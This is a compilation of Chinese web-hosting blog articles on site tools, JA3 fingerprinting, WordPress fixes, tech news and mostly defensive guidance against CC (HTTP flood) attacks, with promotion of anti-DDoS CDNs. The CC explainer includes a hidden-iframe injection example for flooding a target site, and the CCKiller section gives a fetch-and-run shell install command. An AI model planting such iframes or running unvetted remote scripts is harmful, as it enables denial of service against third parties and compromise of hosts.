boce是厦门帝恩思科技股份有限公司旗下网站,该公司著名的产品是DNS.com,这里我们就不多说了,我们来说下boce的特点。 相比17测的,boce的测速对源服务器压力更小,所以测速出来的结果更精准。主机吧测了下,测速最高带宽峰值才5M左右,一般云服务器只要不低于5M都是可以承受的。 boce还支持ping、DNS查询、路由跟踪、IPV6检测、劫持检测、被墙检测、污染检测等功能。功能非常齐全,几乎涵盖了所有网站打不开的情况检测工具。 这么好的网站以前居然不知道,强烈推荐大家以后用这个,17测非常不准,而且每次测试对源服务器压力非常大,好东西不要被埋没了,如果你有更好的站长工具,也可以推荐主机吧。   #### BOT防护中 JA3 指纹技术是什么 JA3 指纹是一种用于识别 SSL/TLS 客户端的方法,它通过分析客户端在 TLS 握手过程中发送的 Client Hello 消息来生成一个独特的标识。这个标识可以用来区分不同的客户端应用程序、版本甚至设备个体。 JA3 指纹的生成过程如下: 从 Client Hello 数据包中提取以下字段的十进制值: TLS 版本 支持的密码套件列表 扩展列表 支持的椭圆曲线列表 支持的椭圆曲线格式列表 将这些字段值按顺序连接起来,字段之间用逗号分隔,字段内的值用连字符分隔。 对连接后的字符串进行 MD5 哈希计算,得到最终的 JA3 指纹。 JA3 指纹在 BOT 防护中的应用主要体现在以下几个方面: 识别恶意流量:通过将客户端的 JA3 指纹与已知的恶意指纹库进行比对,可以识别出伪装成正常用户流量的恶意爬虫或攻击工具。 提高检测准确性:相比传统的基于 IP 和域名的检测方法,JA3 指纹能够更精准地刻画客户端的网络通信特征,减少误报和漏报。 增加攻击成本:由于 JA3 指纹是基于客户端的 TLS 握手特征生成的,要改变指纹需要对客户端的 TLS 配置进行复杂的修改,这在一定程度上提高了攻击的难度和成本。 然而,JA3 指纹也有其局限性: 部分 VPN、代理工具可能会改变客户端的 TLS 配置,导致指纹误判。 客户端软件版本更新或系统升级可能会改变 TLS 配置,使得正常用户的指纹发生波动,需要及时更新指纹库。 高端爬虫可能模拟合法的 JA3 指纹特征,因此需要结合其他反爬手段(如用户行为分析、验证码验证等)来构建更全面的防御体系。 #### Briefly unavailable for scheduled maintenance. Check back in a minute.插件升级失败提示 wordpress提示:Briefly unavailable for scheduled maintenance. Check back in a minute.错误解决办法 解决方法: WordPress在升级程序、主题、插件时,都会先切换到维护模式,也就是显示 “正在执行例行维护,请一分钟后回来(Briefly unavailable for scheduled maintenance. Check back in a minute)”,如果升级顺利,也就几秒左右就恢复正常;但是如果由于网速不佳等原因导致升级中断,WordPress就会一直停留在维护模式,不论前台还是后台,都一直显示“正在执行例行维护,请一分钟后回来“。 如何解决这个问题呢? 解决办法:马上通过FTP登录你的网站,删除WordPress根目录下的 .maintenance ,刷新网页即可。   #### BT 客户端 qBittorrent 存在 14 年的远程代码执行漏洞 11 月 2 日消息,科技媒体 bleepingcomputer 于 10 月 31 日发布博文,报道称知名 BT 下载客户端 qBittorrent 修复了已存在 14 年的中间人劫持 / 远程代码执行漏洞。 该漏洞最早可以追溯到 2010 年 4 月 6 日,官方于 2024 年 10 月 28 日发布的最新版本 5.0.1 中修复,时隔超过 14 年。 该漏洞是由于应用程序的 DownloadManager 组件未能验证 SSL / TLS 证书所导致的,而该组件负责管理整个应用程序的下载。 虽然漏洞已修复,但安全研究公司 Sharp Security 指出,qBittorrent 团队未能向用户充分通报此问题。 Sharp Security 指出,未验证 SSL 证书的情况引发了多项安全风险,主要包括以下 4 个风险: 恶意 Python 安装:在 Windows 上提示用户安装 Python 时,攻击者可替换为恶意安装程序。 恶意更新链接:通过硬编码的 URL 检查更新时,攻击者可替换更新链接,诱导用户下载恶意软件。 RSS 订阅被篡改:攻击者可拦截 RSS 订阅内容,注入伪装的恶意链接。 内存溢出漏洞:qBittorrent 自动下载的 GeoIP 数据库可能被伪造服务器利用,导致内存溢出。 安全研究员指出,中间人攻击在某些地区可能更为常见,用户应尽快升级到最新版本 5.0.1,以确保安全。 #### B站因用户上传《我不是药神》电影被判帮助侵权 需赔偿6.5万元 6月29日 消息:据北京互联网法院消息,因用户在bilibili网站上传《我不是药神》电影的纯音频,上海宽娱数码科技有限公司(以下简称宽娱公司)被优酷信息技术(北京)有限公司(以下简称优酷公司)以侵害信息网络传播权为由诉至北京互联网法院。 近日,北京互联网法院一审认定,宽娱公司应当知晓网络用户利用其网络服务侵害优酷公司信息网络传播权的行为,构成帮助侵权。 原告诉称,原告享有影片《我不是药神》的独占性信息网络传播权。被告网站用户将电影《我不是药神》的纯音频上传“影视>影视剪辑”栏目中,并将标题编辑为“【1080P】我不是药神 影视原声”。 原告认为被告未经许可,擅自提供涉案电影的全部影视原音的播放和下载服务,侵害其享有的信息网络传播权为由诉至法院,请求判令被告赔偿原告经济损失 300000 元和合理费用 20000 元。 被告辩称,对于只有电影原声的音频,由于缺乏必要的画面,没有实质性地体现出作品的完整表达方式、作者表达出的思想内容及作者在影像方面的独特构思;使用的形式和内容非常有限,没有对著作权人的利益构成实质损害。而且对于被告来说,这样的音频很难被发现是一部作品而给予高度注意。 此外,被告系信息网络存储空间服务提供者,涉案音频系网络用户上传,被告不存在应知或明知网络用户利用网络服务侵害他人著作权的情形,不构成帮助侵权,没有明显的过错。因此,本案被告不应承担赔偿侵权责任。 法院经审理认定,本案中,涉案音频系具有极高知名度的涉案电影的完整原声,且上传时间在涉案电影经院线上映后还未正式登陆优酷网之前,正值涉案电影的热播期。因此,被告应当知晓涉案音频为未经许可提供。涉案音频时长近两小时,不仅标题中包含了涉案电影的完整名称,而且位于涉案电影名称搜索结果的第一位。因此无论是从时长、标题还是所在位置来看,涉案视频应能被明显感知。显然,被告应当能知晓涉案音频在其网站传播,未尽到相应注意义务。 综上,被告应当知晓网络用户利用其网络服务侵害原告信息网络传播权的行为,构成帮助侵权。 对此,法院一审判决,宽娱公司于判决生效之日起十日内赔偿优酷公司经济损失 60000 元和合理开支 5000 元。 #### B站小红书故障原因:阿里云上海服务异常,现已恢复 7 月 2 日消息,今天上午,多站网友反馈,B站、小红书等平台均出现不同程度的服务问题。 对此阿里云官方回应,阿里云在 10:04 监控发现上海地域可用区 N 网络访问出现异常,正在紧急处理中。 10 点 35 分,阿里云工程师完成网络切流调度,上海可用区 N 网络访问开始恢复。 10 点 42 分,阿里云称经过处理受影响产品服务已恢复。 故障持续差不多40多分钟,对B站和小红书来说,损失很大。 #### B站网站后台工程源码泄露 内含部分用户名密码 图片版权所属:站长之家 新浪科技讯4 月 22 日消息,据微博@互联网的那点事 爆料称,哔哩哔哩(B站)整个网站后台工程源码泄露,并且“不少用户名密码被硬编码在代码里面,谁都可以用。” @互联网的那点事 爆料微博 微博中截图 微博中截图(部分敏感信息已打码处理) 新浪科技在GitHub上查询后发现,平台上确实存在由一个名叫“openbilibili”的用户创建的“go-common”代码库,项目描述为“哔哩哔哩 bilibili 网站后台工程 源码”。截至北京时间17:04,该项目已获得 6597 个标星和 6050 个代码库分支(fork)。 但新浪科技记者在17: 22 试图fork该代码库时发现,这一代码库已被GitHub“封杀”。 GitHub“封杀”B站源码代码库 #### C / C++被列为不安全语言 美国政府最近发布了一份网络安全报告,建议开发人员停止使用容易出现内存安全漏洞的编程语言,如C和C++,转而使用内存安全的编程语言进行开发。 这份报告由美国网络空间总监办公室 (ONCD) 发布,目的是落实美国总统拜登的网络安全战略,目标是“保护网络空间的基石”。内存安全是指程序在访问内存时能够避免出现错误和漏洞,例如缓冲区溢出和悬空指针。C和C++允许直接操作内存地址,并且缺乏边界检查,容易出现内存安全问题。 报告援引微软和谷歌的研究数据,指出超过 70% 的安全漏洞都与内存安全问题有关。报告还引用了美国网络安全和基础设施安全局 (CISA) 的开源软件安全路线图,建议开发人员从一开始就使用内存安全的编程语言,进行“安全设计”式的开发1。 报告没有推荐特定的编程语言替代 C 和 C++,而是强调有多种内存安全的编程语言可供选择。报告还呼吁企业和工程师采用最佳软件开发实践,并使用内存安全的硬件,以减少恶意攻击的可能性1。 美国国家安全局 (NSA) 在去年 11 月发布的网络安全信息文件中,列出了他们认为安全的编程语言,其中包括:Rust、Go、C#、Java、Swift、JavaScript、Ruby。 这一建议可能会对软件开发行业产生重大影响,因为它可能推动更多的开发人员转向内存安全的编程语言,从而提高软件的整体安全性。然而,需要注意的是,虽然某些编程语言可能在某些方面具有更高的安全性,但没有一种编程语言是绝对安全的,最终的安全性取决于开发者的编程实践和经验。 #### cache-control怎么设置 支持动态加速的CDN一般都是遵循cache-control设置来做缓存的,比如百度云加速,所以cache-control设置显得非常重要。今天我们就来说下cache-control怎么设置: cache-control设置是在WEB服务器上设置的。 Apache .htaccess文件添加代码 <filesMatch "\.(ico|gif|jpg|png|jpeg)$"> ExpiresActive On ExpiresDefault "access plus 11 month" Header append Cache-Control "public" </filesMatch> Nginx location ~ .*\.php$ { if ($request_uri !~ ^/dynamicimg/) { add_header Cache-Control "no-cache"; add_header Pragma no-cache; } } IIS config.xml文件 <configuration> <system.webServer> <staticContent> <clientCache cacheControlMode="UseExpires" httpExpires="Tue, 19 Jan 2038 03:14:07 GMT" /> </staticContent> </system.webServer> </configuration> PHP php.ini文件 session.cache_limiter = nocache 改为  session.cache_limiter = none 修改完后记得重启下服务器配置。 Cache-Control参数详解: no-cache: 数据内容不能被缓存, 每次请求都重新访问服务器, 若有max-age, 则缓存期间不访问服务器. no-store: 不仅不能缓存, 连暂存也不可以(即: 临时文件夹中不能暂存该资源) private: 只能在浏览器中缓存, 只有在第一次请求的时候才访问服务器, 若有max-age, 则缓存期间不访问服务器. public: 可以被任何缓存区缓存, 如: 浏览器、服务器、代理服务器等 max-age: 相对过期时间, 即以秒为单位的缓存时间. no-cache, private: 打开新窗口时候重新访问服务器, 若设置max-age, 则缓存期间不访问服务器. private, 正数的max-age: 后退时候不会访问服务器 no-cache, 正数的max-age: 后退时会访问服务器 #### Canalys:2023年第三季度中国大陆云计算市场占有率阿里云39%华为云19%腾讯云15% 中国大陆云计算市场分析在2023年第三季度,中国大陆的云计算市场表现出了稳定的增长趋势。根据Canalys的报告,云基础设施服务支出同比增长了18%,达到了92亿美元,占全球云支出的12%。这一增长主要得益于政府和国企的推动,尽管市场整体保持保守态度。头部厂商业绩与AI战略 在这个市场中,阿里云、华为云和腾讯云作为头部厂商,合计增长了22%,占客户支出份额的73%。具体来看,阿里云以39%的市场份额位居第一,华为云以19%的市场份额紧随其后,腾讯云则以15%的市场份额排在第三位。 阿里云在最近的财报中宣布放弃分拆云业务部门的计划,并且正在通过减少低利润的项目型业务来优化盈利能力,同时继续推出新的AI产品。华为云在2023年9月发布了AI Gallery平台,该平台集成了多种开源AI大模型,面向全球企业和开发者开放,以便于AI模型的定制化应用。腾讯云则在放弃低质量、低利润的项目后,业务表现超出预期,并在9月份宣布了合作伙伴发展的最新进展。 市场未来展望 Canalys预测中国云计算市场未来将进入稳定增长阶段,大多数厂商都意识到发展合作伙伴生态系统的重要性。尽管AI技术的复杂性为技术部署带来挑战,但也为更广泛的AI生态系统带来机遇。 综上所述,中国大陆云计算市场在第三季度保持了稳健的增长,头部厂商阿里云、华为云和腾讯云都在积极布局AI领域,以期在未来的市场竞争中占据有利地位。 #### CA又搞事啦!2026年3月起,SSL证书有效期缩短至200天! 根据CA/B(证书颁发机构/浏览器论坛)最新的投票结果,自2026年03月15日起,所有证书的有效期将计划缩短至200天(包含正式证书和个人测试证书pro)。 这影响是非常大的,目前国内所有收费的SSL证书都是按年收费的,有效期也是按年算的,这意味着2026年3月起,这些证书将无法按年购买了。 从目前来看,阿里云针对这个限制已经做了调整。 简单的说,阿里云现在提供了一个一年期可随时更换域名的SSL证书订阅服务,这期间颁发的SSL证书过期了,会自动为你更新下一张SSL证书,保证你域名在一年内有SSL证书可用。 但是这里有一个问题是,SSL证书的有效期依然是按200天有效期来算的,也就是说即使你买了阿里云的一年SSL订阅服务,颁发的证书有效期也是200天,那么200天后你就需要再重新部署下的SSL证书来解决有效期问题,这增加了网站维护的成本。 如果你无法实现自动化更新SSL证书的话,那么这是相当麻烦的,主机帮已经能想象到将会出现一堆因为SSL过期无法打开的网站出现了。 #### CC 攻击的防御手段(CC攻击防御方法大全) 什么是CC攻击? CC攻击(ChallengeCoHapsar,挑战黑洞)是DDoS攻击的一种常见类型,攻击者控制某些主机不停地发送大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。 CC攻击主要针对WEB服务器发送大量并发请求,重点针对应用程序中比较消耗资源的功能,占用大量系统资源。CC攻击的攻击技术含量和成本很低, 只要有上百个IP,每个IP弄几个进程,就可以有上千个并发请求,很容易让被攻击目标服务器资源耗尽,从而造成网站宕机。 CC攻击的防御手段 1.提高服务器性能 CC攻击是以消耗服务器资源为主,那么高性能服务器硬件能力和充足的网络带宽资源可以提升系统对CC攻击的承载能力,不过提升服务器性能的成本要远比CC攻击成本高,所以谨慎使用。 2.网页静态化 纯静态的网页请求可以减少对服务器资源的消耗,提高服务器并发能力,从而让网站具有一定的抗CC能力。 3.使用负载均衡 现在很多云服务器商都提供负载均衡器,负载均衡器通过将流量分发到不同的后端服务来扩展应用系统的服务吞吐能力,消除单点故障并提升应用系统的可用性,可以解决一些中小型CC攻击,但其实这跟提高服务器性能一样,成本相当高,跟CC攻击比起来,差太远。 4.限制非法请求IP 一些简单的CC攻击其IP是非常少的,可以通过防火墙对CC攻击的IP进行屏蔽访问。这方法只适用于攻击方代理IP少的情况下有效。 5.限制浏览器UA UA是识别浏览器的重要证明,一些CC工具的访问UA都是一样的,我们只要利用防火墙把对方的UA禁止访问,就可以达到防御作用。 6.限制IP请求频率 CC攻击为了达到消耗服务器的作用,每个IP都会对服务器进行频繁的访问,通过防火墙限制每个IP 10秒钟内可以访问多少次,超过会被暂时拦截,可有效防御CC攻击。 7.JS挑战 这是一种安全防御商常用的防御CC攻击的手段,通过对每个访问网站的访客进行JS质询,合法用户正常跳转,非法用户进行拦截。 8.CDN内容分发 CDN类似于负载均衡器, 不同的是CDN对源服务器配置要求高,普通CDN想要防御CC攻击,需要把网站内容全部缓存至CDN节点,让CC攻击尽可能少的请求进服务器,从而达到防御CC攻击的作用,不过CC攻击会产生大量的流量,如果你的CDN是按量计费的,那么请谨慎使用,一不小心就会产生大量的费用,造成严重经济损失。 9.推荐防御产品 目前市面上很多防御CC攻击的产品,不过很多效果并不理想,而且误杀几率很高,主机吧这里推荐百度云加速和京东云星盾,这两个都是高防CDN,而且都是大厂产品,主机吧代理百度云加速超过5年,百度云加速防御效果杠杠的,市面上几乎99.9%的CC攻击都是可以防御,而且误杀极低,推荐大家使用。相关链接 #### CCKiller:可防轻量级CC攻击免费防御工具 这是一个来自于国内大神张戈博客自己开发的网站防CC攻击工具,支持秒级检查、自动拉黑和释放。如果你的网站经常受到轻量级的CC攻击的话可以尝试使用下。 一、功能申明 分享之前我必须先申明一下,众所周知,DDoS 攻击指的是分布式拒绝服务。而 CC 攻击只是 DDoS 攻击的一种,本文所阐述的 CC 攻击,指的是单个 IP 达到我们设定好的阈值并发请求,而非海量 IP 的低并发攻击!对于个人低配服务器,除了使用 CDN 来防护,至少我是没有想到如何抵挡海量 IP 攻击的!因为每个 IP 都模拟正常的用户浏览器请求,并不会触发防御阈值,同时来 1000 个,甚至上万个,个人低配服务器的带宽在第一时间就会被占满,就无法继续提供服务了。 当然,用脚本也是无法防御 DDoS 大流量攻击的,因为所有机房的防御带宽是有限的,当攻击的流量超过了机房的防御带宽,要么机房把你的服务器 IP 拉黑洞,要么就一起死。因此,如果你的服务器正遭受大流量攻击,比如几十 G 上百 G,一般机房或 CDN 节点都是扛不住的,脚本也无能为力了,赶紧换高防服务器、高防IP、高防CDN吧。 二、功能介绍 通过以上申明,也就大致给 CCKiller 一个定位:CCKiller 是用于个人低配服务器的轻量级 CC 攻击防御,可以抵挡单个 IP 产生的高并发攻击。 目前设计的功能特性如下: ①、秒级检查 很多人写的防御脚本都是使用了 Linux 系统的计划任务 crontab 来定时检查的。而 crontab 的最细颗粒是 1 分钟,也就是说脚本最快也只能 1 分钟检查一次。对于一些强迫症来说就会很不爽。 所以,我还是按照以前分享的思路,利用 while 循环实现秒级检查,实现更细的颗粒。当然,CCKiller 更是被我写成了系统服务,更加灵活稳定。 ②、拉黑时长 CCKiller 可以设置拉黑时长,默认为 10 分钟。当发现有恶意请求时,会自动拉黑目标 IP,并在拉黑时长结束后自动释放,这个功能算是对我之前写的脚本的一个大的改进。 ③、并发阈值 CCKiller 可以设定单个 IP 的最高请求数,如果某个 IP 同时请求数超过了设定的阈值,就会被暂时拉黑一段时间。 ④、邮件发送 这个功能没啥好说的,意义并不大。而且发送成功率和服务器的环境也有很大关系。 ⑤、并发显示 安装后,直接运行 cckiller 会列出当前系统的请求排行,可以清晰的看到当前请求 IP 和并发数。使用-s 参数还可以继续定制需求,比如 cckiller -s 10 就能显示当前并发数排行前 10 名的 IP。 ⑥、手动拉黑 支持手动拉黑,执行后会立即检查,将并发请求超过 n 的 IP 拉黑一段时间,比如 cckiller -k 100 就会将目前超过 100 个请求的 IP 拉黑一段时间,如果没有则不会执行任何拉黑操作。 三、工具安装 ①、在线安装 由于我可能经常会更新一些功能,或修复一些 BUG,所以仅提供在线安装,以保证脚本是最新的。 安装非常简单,执行如下命令就能进入配置步骤了: curl -ko install.sh --connect-timeout 300 --retry 5 --retry-delay 3 https://zhangge.net/wp-content/uploads/files/cckiller/install.sh?ver=1.0.8 && sh install.sh -i 详细地址:https://zhang.ge/5066.html 这里主机吧就不多介绍了,可以进入张戈博客看下。 #### CC攻击一般多久?(被CC攻击一般多久才停) 相信有不少站长在网站运营的时候会遇到CC攻击,CC攻击是DDOS的一种,他的成本极低,而且效果好,可以很轻松的使网站瘫痪,因些是黑客攻击网站最常用的一种方式。 很多站长以为被CC攻击躺平一两天就过去了,实事上,CC攻击是非常久的。黑客只需要设定工具,就可以实现每天准时攻击你的网站,而且一次几个小时,第二天又来攻击你,主机吧有位客户直接更是被这样攻击了半年之久。 上周主机吧的一位被CC攻击的用户,尽管接入百度云加速后防住了,但是我们可以看到百度报表上,每天都有攻击,每个时间段都有,已经持续快一周了,一点停的迹象都没有。 可见CC攻击时长一般动辄几天,设置几个月都有,一但被CC攻击盯上,我们要做好长期防御的准备。 #### CC攻击常见类型集合 什么是CC攻击? CC攻击是攻击者借助代理服务器或者大量肉鸡模拟多个用户不断访问目标网站,生成指向受害主机的合法请求,实现DDoS和伪装攻击。 因需处理大量请求及后台数据库查询动作,服务器CPU、内存、带宽等资源长时间被占用浪费,无法处理完持续的高并发请求,进而引起堵塞,反应缓慢或直接陷入瘫痪状态。最终导致访目标网站或应用无法正常提供服务。 下面我们来盘点下市面上常见的CC攻击类型: 1.肉鸡攻击 黑客使用CC攻击软件,控制大量肉鸡模拟正常用户访问网站,伪造合法数据包请求,消耗服务器资源; 2.代理攻击 黑客借助代理服务器生成指向受害网站(受害服务器)的合法网页请求,从而实现DOS和伪装,相对肉鸡攻击更容易防御; 3.僵尸攻击 攻击者通过各种途径传播“僵尸程序”,感染用户电脑。通常是网络层面的DDoS攻击,Web应用层面无法进行太好的防御; 4.SYN-CC攻击 攻击者直接使用高并发来请求目标导致目标网站或应用无法提供正常服务,较为常见; 5.POST流量耗用型 攻击者恶意提交数据交互导致服务中断,带宽耗用很高,通常也会消耗掉大额的短信费用; 6.模拟UA以及常规的百度伪装 属于常规伪装攻击,大部分网站攻击中一般会出现伪装百度的CC攻击,非常普遍; 7.浏览器漏洞CC请求攻击 利用浏览器漏洞控制浏览器来发动攻击,该类攻击不是伪装,是真实请求,比较难防护的攻击类型; 8.路由盒子劫持攻击 这类攻击请求也是合法的,且路由盒子量非常庞大,较难防御,但较少出现。 #### cc攻击怎么防御 网站突然打不开,突然变卡,服务器CPU爆满100%,这都网站被CC攻击的表现,那么CC攻击要怎么防御呢?今天主机吧就来教大家如何防御CC攻击。 1.解除域名解析 在确定是CC攻击的时候,我们需要做的就是临时删除域名解析,这样做的目的是为了恢复服务器状态,因为CC攻击是通过域名攻击进来的,解除域名解析后,攻击找不到目标,服务器自然就恢复正常了。我们和一步要做的就是先恢复服务器状态。 2.装防火墙 防火墙有本地防火墙和云防火墙,本地防火墙类似于安全狗、云锁、宝塔防火墙这些,不过本地防火墙由于受限服务器配置,防御能力并不是很好,对付一些小的CC攻击可以,但对于中大型CC攻击则完全无效。 而云防火墙,一般是指高防CDN和高防IP,他们是专门用来防御DDOS和CC攻击的,可以防御中大型CC攻击。 主机吧这里推荐两款有效防御CC高防CDN给大家: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html 百度云加速CC操作方法:进入安全功能-ADS-CC防护,开启强力防护即可 京东云星盾CC操作方法:进入安全规则-防火墙设置-CC防护,开启BOT识别模式,安全级别开启:遭受攻击,浏览器完整性检查:开启 即可完成CC防护。 #### CC攻击持续的吗?一直打的吗?网站遭遇24小时不间断CC攻击怎么办? 这是一个非常好的问题,也是很多网站管理员困惑的点。 简单来说:CC攻击不一定是7×24小时不间断的,但它具有“持续性”的特征,其攻击模式可以灵活多变。 下面为您详细解释几种常见的情况: 1. 持续不间断型攻击 这种攻击模式就像一场“围城战”。攻击者会调动大量的“僵尸”计算机或模拟请求,一刻不停地向您的网站目标(如首页、登录页、搜索接口、API接口)发起请求。 特点: 目的明确:旨在用最快速度耗尽您的服务器资源(如带宽、CPU、数据库连接数),让网站彻底瘫痪。 易于发现:由于攻击流量持续存在,监控系统会立刻报警,相对容易识别。 比喻:就像派了成千上万的人,持续不断地挤在您的店铺门口,让真正的顾客永远进不来。 2. 间歇性/脉冲型攻击 这是一种更狡猾、更难以防范的模式。攻击者会间歇性地发起攻击,比如攻击10分钟,停止5分钟,然后再攻击。 特点: 逃避简单封禁:当您发现攻击并准备手动排查时,攻击可能突然停止,让您无从下手;当您放松警惕时,攻击又再次来临。 消耗与分析:这种模式旨在持续干扰您的业务,让网站时好时坏,同时攻击者也在观察您的防御策略和响应方式。 成本更低:对于攻击者而言,这种模式所需的攻击资源也更少。 比喻:像是一个讨厌的骚扰者,不时地来用力敲你的门,你刚开门他就跑掉,但你永远无法安心休息。 3. 低慢型攻击 这是最高级的模式,攻击者将流量伪装得非常像正常用户,请求频率不高,但会长时间、不间断地访问那些最消耗服务器资源的页面(如复杂搜索、大数据列表页)。 特点: 极强隐蔽性:单看一个IP,其行为与正常用户无异,很容易绕过基于频率的简单防护规则。 温水煮青蛙:由于单个请求消耗不大,短时间内不易察觉。但当成百上千个这样的“慢速”请求同时进行时,会缓慢而稳定地将服务器资源耗尽。 最难防御:需要智能的AI模型或行为分析技术才能将其从正常流量中区分出来。 总结与核心要点 攻击类型持续性主要目的防御难度持续不间断型高,一直打快速击垮目标中等,易于发现但需要足够防护能力间歇性/脉冲型中,打打停停持续干扰,逃避封禁较高,需要持续监控和智能调度低慢型高,但流量低缓慢耗尽资源,逃避检测极高,依赖AI和行为分析 所以,回答您的问题:CC攻击可以是“一直打”的,也可以是“打打停停”的。 攻击者会根据目标网站的防御弱点和响应情况,动态调整攻击策略。 如何有效应对? 正因为CC攻击模式的多样性,单一的防御手段往往不够。推荐使用像百度云防护这样的专业服务,因为它能提供综合解决方案: AI智能防护:通过AI学习网站的正常流量模式,无论攻击是持续还是间歇,都能智能识别异常并自动拦截。 精准频率控制:可以为关键页面(如登录、搜索、API)设置访问频率阈值,直接扼杀持续型和脉冲型攻击。 JA3指纹识别:能够识别并封禁来自特定攻击工具(如黑客软件、恶意爬虫框架)的请求,从源头切断攻击链。 7x24小时监控与调度:即使攻击者采用“打停”策略,防护系统也能全程监控,并在攻击来袭时智能调度资源进行清洗,保障网站持续可用。 结论: 不要抱有侥幸心理,认为攻击只会持续一会儿。专业的防护方案能确保您的网站在面对任何一种CC攻击模式时,都能保持稳定和安全。 以下是百度云防护的一个客户案例: 检测显示该网站遭遇了24小时不间断的CC攻击,好在百度云防护为客户网站自动拦截了CC攻击,否则该客户网站将面临一整天无法打开的情况。 #### CC攻击是什么?如何防止网站被CC攻击? 对于绝大多数的朋友而言,对于CC攻击都是很陌生的,只知道它是一种网络攻击方式,并不知道它是怎么完成攻击的。那么到底CC攻击是什么?如何防止网站被CC攻击呢? CC攻击是DDOS(分布式拒绝服务)的一种形式,也是近年来一种常见的网站攻击形式,其攻击原理是通过代理服务器或者肉鸡向受害主机不停地发大量数据包,造成对方服务器资源耗尽,直到对方服务器宕机崩溃。不可否认,CC攻击会造成很大的影响,使真正的用户访问不了或者访问很慢,导致大批量用户流失,网站流量骤降,给企业造成巨大的损失。 下面小编给大家分享几种常用的预防CC攻击的方法和方式: 1、使用百度云加速 百度云加速为广大站长免费提供了网站加速,智能高防DNS,防DDOS,预防CC攻击,防黑客和网站在线等服务,是百万站长的共同选择。当然最如果攻击量大的话最好买百度云加速收费版的。 2、利用IIS屏蔽IP 我们可以在日志文件里面查看CC攻击的ip,然后就可以在IIS中进行设置来屏蔽该IP对Web站点的访问,从而达到防范IIS攻击的目的。 3、设置拒绝代理访问 一般CC攻击可以利用代理发动攻击,我们可以设置“拒绝所有代理访问”就可以很好的防止代理访问的攻击。 4、修改Web端口 一般情况下Web服务器通过80端口对外提供服务,因此攻击者实施攻击以默认的80端口进行攻击,所以,我们可以修改Web端口达到防CC攻击的目的。 5、使用百度云加速 #### CC攻击的危害 CC攻击是一种非常常见的网络攻击方式,它以“脏”的HTTP请求数据包来耗尽被攻击服务器的资源,导致被攻击服务器的性能急剧下降,甚至无法正常运行。CC攻击的危害十分严重,下面是CC攻击的主要危害: 计算机系统崩溃 当CC攻击导致计算机系统崩溃时,首先会直接影响到网站的正常运营,其次,由于网站无法访问,会导致网站排名下降,从而影响网站的搜索排名,使网站访问量下降,从而导致网站的收益下降。 信息泄漏 CC攻击会导致被攻击的服务器暴露在公共网络上,攻击者可以利用漏洞获取用户敏感信息,如账号密码、银行卡号等,从而实施各种网络犯罪活动,给用户带来极大的损失。 影响网络安全 CC攻击会影响网络安全,因为它可以破坏网站的稳定性,使网站容易出现故障,从而导致用户数据丢失或被盗,损害用户利益。 其他影响 CC攻击还会导致服务器无法访问,使网站的业务受到严重影响,无法正常运营,从而给企业带来不必要的经济损失。 总之,CC攻击的危害十分严重,它可能会导致计算机系统崩溃、信息泄漏、影响网络安全以及其他影响。因此,为了保护自己的电脑系统和自身利益,用户们应该采取相应的措施来预防和抵御CC攻击。 #### CC攻击的原理与防御方法 什么是CC攻击 CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,是一种常见的网站攻击方法,攻击者通过代理服务器或者肉鸡向受害主机不停访问,造成服务器资源耗尽,一直到宕机崩溃 CC攻击利用代理服务器向网站发送大量需要较长计算时间的URL请求,如数据库查询等,导致服务器进行大量计算而很快达到自身的处理能力而形成DOS 而攻击者一旦发送请求给代理后就主动断开连接,因为代理并不因为客户端这边连接的断开就不去连接目标服务器,因此攻击机的资源消耗相对很小,而从目标服务器看来,来自代理的请求都是合法的 CC攻击示例 例如攻击者成功黑了一个访问量巨大的网站首页,在页面中添加了100个如下的代码: <iframe src=http://aaa.com border="0" width="0" height="0"></iframe> http://aaa.com 就是攻击的目标网站 效果就是每当有人访问了这个被黑的首页,就有100个http://aaa.com请求 由于这个被黑的首页访问量极大,所以http://aaa.com的压力可想而知 这个方式还是有点复杂,需要黑掉某网站,现在方便了,免费的代理非常多,所以CC的主要手段就变为使用大量代理服务器发起攻击 CC与DDOS的区别 DDoS是针对IP的攻击,而CC攻击的是网页 DDoS可以用硬件防火墙来过滤攻击,CC攻击本身的请求就是正常的请求,硬件防火墙对他起不到很好的防御效果 CC攻击的常用防护方式 01 云WAF 例如:百度云加速 思路很简单,就是用户访问你的域名时,会经过这类产品的代理扫描,发现问题直接拦下,没问题的话就把用户请求转到你的网站 优点 安装配置简单、报表清晰,可自主操作,大公司产品保障,出现误杀几率极少 弊端 1)有绕过的风险 WAF对网站的保护主要是通过反向代理来实现,如果不经过这个代理,自然就无法防护网站,所以,攻击者已知网站的源服务器IP是可以不经过WAF来实现攻击的,所以安装防护前必须隐藏好源服务器IP或者给服务器换个新IP再用百度云加速隐藏起来。 02 web服务器端区分攻击者与正常访客 通过分析网站日志,基本可以分辨出哪个IP是CC攻击的 例如普通浏览者访问一个网页,必定会连续抓取网页的HTML、CSS、JS和图片等一系列相关文件,而CC攻击是通过程序来抓取网页,仅仅只会抓取一个URL地址的文件,不会抓取其他类型的文件 所以通过辨别攻击者的IP,进行屏蔽,就可以起到很好的防范效果 03 网站内容静态化 静态内容可以极大程度的减少系统资源消耗,也就解决了攻击者想要让服务器资源耗尽的目的,所以我们如果你想推广某一产品,比如做百度竞价的,做一个单页安全性比动态网页高。除了DDOS攻击,CC攻击是很难让服务器挂掉的。 04 限制IP连接数 一般正常的浏览者肯定不会在一秒内连续多次极快的访问同一个页面,可以配置web服务器,限定ip访问频率,就像百度云加速就有IP频率限制功能,可以起到一定的作用。 05 限制代理的访问 因为一般的代理都会在HTTP头中带X_FORWARDED_FOR字段,但也有局限,有的代理的请求中是不带该字段的,另外有的客户端确实需要代理才能连接目标服务器,这种限制就拒绝了这类合法客户   